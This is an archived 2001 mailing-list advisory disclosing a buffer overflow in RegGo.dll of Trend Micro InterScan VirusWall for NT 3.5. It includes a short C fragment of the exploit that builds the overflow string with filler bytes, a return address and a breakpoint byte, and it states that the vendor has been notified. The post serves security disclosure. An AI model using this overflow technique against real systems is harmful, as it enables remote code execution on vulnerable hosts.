TrendMicro Interscan VirusWall RegGo.dll BOf

From: Nobuo Miwa (n-miwaat_private)
Date: Fri May 18 2001 - 10:15:54 PDT


    Hi,
    
    This is a Buffer Overflow vulnerability in Trend Micro
    InterScan VirusWall for NT 3.5.
    RegGo.dll is the one.
    
    The following code is a piece of the exploit program.
    
        for ( j=0 ; j<820 ; j++ )
            sploit[j]='a' ;
        sploit[j++]=0xD5 ;
        sploit[j++]=0x63 ;
        sploit[j++]=0xF6 ;
        sploit[j++]=0x77 ;
        sploit[j++]=0xCC ; /* --> any code will be executed */
    
    I've already reported this to the Trend Micro support team, and they
    will fix this issue in InterScan version 3.51 Build 1349.
    
    
    <Nobuo Miwa> n-miwaat_private       ( @ @ ) http://www.lac.co.jp/security/
    -------------------------------o00o--(. .)--o00o--------------------------
    The moderator of BUGTRAQ-JP
    


